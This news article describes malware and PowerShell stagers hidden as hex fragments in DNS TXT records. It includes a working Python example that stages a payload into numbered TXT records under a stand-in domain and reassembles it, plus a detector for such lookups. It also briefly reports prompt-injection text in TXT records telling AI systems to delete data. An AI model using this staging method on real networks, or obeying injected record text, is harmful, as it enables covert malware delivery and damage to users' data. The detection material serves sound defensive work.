Technology

Revealed: Hackers Exploit DNS to Deliver Malware Undetected!

2025-07-17

Author: Ming

The Ingenious New Tactic of Cybercriminals

Cybercriminals keep finding ways to evade detection, and the latest method documented involves abusing the domain name system (DNS) itself. Nothing is hijacked: the attackers publish ordinary records in a domain they control. A system built to map domain names to IP addresses is being used as an unorthodox file store for malware.

How They Do It: The Sneaky Process Uncovered

Researchers at DomainTools found malicious binaries, among them Joke Screenmate, a prank program classed as nuisance malware, stored inside DNS TXT records. TXT records are free-form text fields, normally used for things like SPF and DKIM policy, so a zone owner can put any string in them. Joke Screenmate is a nuisance rather than a destructive payload: it disrupts normal use of the machine with fake alerts and slowdowns.

A Simple yet Effective Trick

As Ars Technica explains, the process is straightforward: the malware file is hex-encoded, the hex string is cut into fragments, and each fragment is published as the TXT record of a different subdomain, in an order the retrieving code knows how to follow. Anything on the victim machine that can issue DNS queries, which is practically anything, can fetch the fragments in sequence with ordinary TXT lookups, concatenate them and decode the hex back into the original binary. There is no HTTP download and no connection to a suspicious host, only DNS traffic, which most network controls pass without inspecting the contents; the binary never crosses a web proxy or a file-scanning gateway.
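The round trip, as an added example in Python that is neither DomainTools' or Ars Technica's code nor the observed malware: stage_into_txt models the attacker side, hex-encoding a constructed byte string and publishing the fragments as TXT records of numbered subdomains, and reassemble_from_txt models the victim side walking those records with plain TXT lookups until the first NXDOMAIN. The staging domain stage.example, the numbered-label layout and the in-memory zone standing in for a resolver are assumptions of the example; in the field the lookups would be real queries (dig TXT 0.stage.example, Resolve-DnsName, or any resolver library).

```python
import binascii
import hashlib

# Constructed stand-in for the staged binary: an arbitrary byte string with a
# fake "MZ" header, not real malware. The domain is an assumption of the example.
STAGING_DOMAIN = "stage.example"
PAYLOAD = b"MZ\x90\x00" + bytes(range(256)) * 3  # 772 bytes


def stage_into_txt(payload: bytes, domain: str, chunk_bytes: int = 100) -> dict:
    """Attacker side: hex-encode the payload, cut the hex into fixed-size
    fragments and publish fragment i as the TXT record of i.<domain>.
    Returns a dict modelling the zone (owner name -> TXT string).
    100 bytes become 200 hex characters, under the 255-octet limit of a
    single TXT character-string, so each fragment fits in one string."""
    hexed = binascii.hexlify(payload).decode("ascii")
    step = chunk_bytes * 2
    return {f"{i // step}.{domain}": hexed[i:i + step]
            for i in range(0, len(hexed), step)}


def make_resolver(zone: dict):
    """Return a TXT lookup function backed by the in-memory zone, standing in
    for recursive resolution. Returns None where a real resolver would
    answer NXDOMAIN (no such subdomain)."""
    def resolve_txt(name: str):
        return zone.get(name)
    return resolve_txt


def reassemble_from_txt(resolve_txt, domain: str) -> bytes:
    """Victim side: query 0.<domain>, 1.<domain>, ... until the first missing
    name, join the fragments in order and decode the hex back to bytes.
    Every step is an ordinary TXT query; nothing here looks like a download."""
    fragments = []
    idx = 0
    while (txt := resolve_txt(f"{idx}.{domain}")) is not None:
        fragments.append(txt)
        idx += 1
    return binascii.unhexlify("".join(fragments))


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def demo():
    """Stage the constructed payload, fetch it back and verify integrity.
    Returns (number of TXT records published, hash of rebuilt == hash of original)."""
    zone = stage_into_txt(PAYLOAD, STAGING_DOMAIN)
    rebuilt = reassemble_from_txt(make_resolver(zone), STAGING_DOMAIN)
    return len(zone), sha256(rebuilt) == sha256(PAYLOAD)


if __name__ == "__main__":
    records, intact = demo()
    print(f"{records} TXT records published, reassembly intact: {intact}")
```

With 772 bytes and 100-byte fragments the constructed payload needs eight TXT records; a real binary of a few hundred kilobytes needs thousands of sequential TXT lookups to one parent domain, which is the observable a defender with resolver logs can key on.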

Encryption Complicates Detection

Detection gets harder with the spread of encrypted DNS: DNS over HTTPS (DoH) and DNS over TLS (DoT). Both encrypt the exchange between the client and the resolver, so a network sensor in between sees only a TLS session (for DoH, one indistinguishable from ordinary HTTPS) and cannot read the names being looked up or the records returned. The resolver at the far end still sees the plaintext queries, but unless the organisation runs that resolver itself, that visibility belongs to someone else. As Ian Campbell of DomainTools notes, even companies with their own DNS resolvers find it hard to tell legitimate requests from suspicious ones.
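Campbell's point is about what to look for once resolver logs are available. As an added example that is not part of the DomainTools research, the Python below applies two heuristics to a constructed query log (the log layout, addresses and domain names are made up for the example): a client fetching sequentially numbered TXT records under one parent domain, which is what a fragment walk looks like in query logs even when the transport was encrypted, and, where response contents are available (passive DNS or capture at the resolver), TXT values that are long pure-hex strings, which legitimate SPF, DKIM and DMARC records are not.

```python
import re
from collections import defaultdict

# Constructed resolver query log in an assumed "timestamp client qtype qname"
# layout; not a capture from any real resolver. Client 10.0.0.7 walks numbered
# TXT records under stage.example the way a fragment download would, while
# 10.0.0.5 does normal mail-related TXT lookups and 10.0.0.9 is noise.
QUERY_LOG = """\
2025-07-17T10:00:01Z 10.0.0.5 A www.example.org
2025-07-17T10:00:01Z 10.0.0.5 TXT _dmarc.example.org
2025-07-17T10:00:01Z 10.0.0.5 TXT selector1._domainkey.example.org
2025-07-17T10:00:02Z 10.0.0.7 TXT 0.stage.example
2025-07-17T10:00:02Z 10.0.0.7 TXT 1.stage.example
2025-07-17T10:00:02Z 10.0.0.7 TXT 2.stage.example
2025-07-17T10:00:03Z 10.0.0.7 TXT 3.stage.example
2025-07-17T10:00:03Z 10.0.0.7 TXT 4.stage.example
2025-07-17T10:00:03Z 10.0.0.7 TXT 5.stage.example
2025-07-17T10:00:04Z 10.0.0.7 TXT 6.stage.example
2025-07-17T10:00:04Z 10.0.0.7 TXT 7.stage.example
2025-07-17T10:00:05Z 10.0.0.9 TXT 1.things.example
2025-07-17T10:00:05Z 10.0.0.9 TXT 2.things.example
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$")


def parse_log(text):
    """Yield one dict per well-formed log line; silently skip anything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_txt_chunk_walks(text, min_chunks=5):
    """Group TXT queries per (client, parent domain) whose leftmost label is a
    bare integer, then flag the pair when those labels contain a contiguous
    run 0..n-1 with n >= min_chunks: the client fetched sequentially numbered
    fragments. Returns {(client, parent): n}. Works on query logs alone, so
    it does not depend on seeing the answers."""
    seen = defaultdict(set)
    for q in parse_log(text):
        if q["qtype"] != "TXT":
            continue
        first, _, parent = q["qname"].rstrip(".").partition(".")
        if first.isdigit() and parent:
            seen[(q["client"], parent)].add(int(first))
    findings = {}
    for key, labels in seen.items():
        n = 0
        while n in labels:
            n += 1
        if n >= min_chunks:
            findings[key] = n
    return findings


HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def looks_like_hex_blob(txt, min_len=64):
    """True for a TXT value that is nothing but hex digits and long enough to
    be a payload fragment rather than a verification token. SPF ("v=spf1 ..."),
    DKIM ("v=DKIM1; ...") and DMARC ("v=DMARC1; ...") contain non-hex
    characters and fail this test. Needs response contents, e.g. passive DNS."""
    return len(txt) >= min_len and HEX_RE.match(txt) is not None


def triage(text, min_chunks=5):
    """Human-readable summary of the chunk-walk findings, one line per pair."""
    return [f"{client} fetched {n} numbered TXT records under {parent}"
            for (client, parent), n
            in sorted(find_txt_chunk_walks(text, min_chunks).items())]


if __name__ == "__main__":
    for line in triage(QUERY_LOG):
        print(line)
```

The threshold is deliberately low in the constructed sample; on a real resolver tune min_chunks against a baseline, and expect legitimate numbered TXT lookups to be rare outside of a few verification schemes, so a run of dozens to one unfamiliar parent domain is worth a look even when the content is unreadable.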

Beyond Simple Malware: A Broader Threat

The researchers also found the technique used for more than hiding a single binary: TXT records carrying PowerShell scripts that act as stagers for further malware, likely tied to a Covenant C2 command-and-control framework. A stager is a small first-stage script whose only job is to fetch and run the real payload; these retrieve it from other domains and do nothing until a local script on the victim executes them. The stager and the instructions for where to get the next stage all travel in TXT records.

A Disturbing Trend in AI Manipulation

The researchers also found TXT records containing text written as prompt injections aimed at AI chatbots. The idea is that an AI system which fetches DNS records, or is fed them by a tool, will treat the record's text as instructions rather than as data. The strings ranged from harmless prompts to instructions such as deleting data. Whether any of it works depends on the consuming application handing record contents to a model without separating data from instructions, the same root cause as every other indirect prompt injection.

Conclusion: DNS as a New Threat Front

The case shows that DNS is no longer just plumbing: it serves as a transport for malware delivery and staging, for data theft, and potentially for manipulating AI systems. The practical lesson is to log DNS at a resolver you control, treat bulk TXT lookups to unfamiliar domains as worth investigating, and point clients' DoH and DoT at that resolver rather than letting them pick their own. As long as DNS remains a blind spot, attackers will keep using it.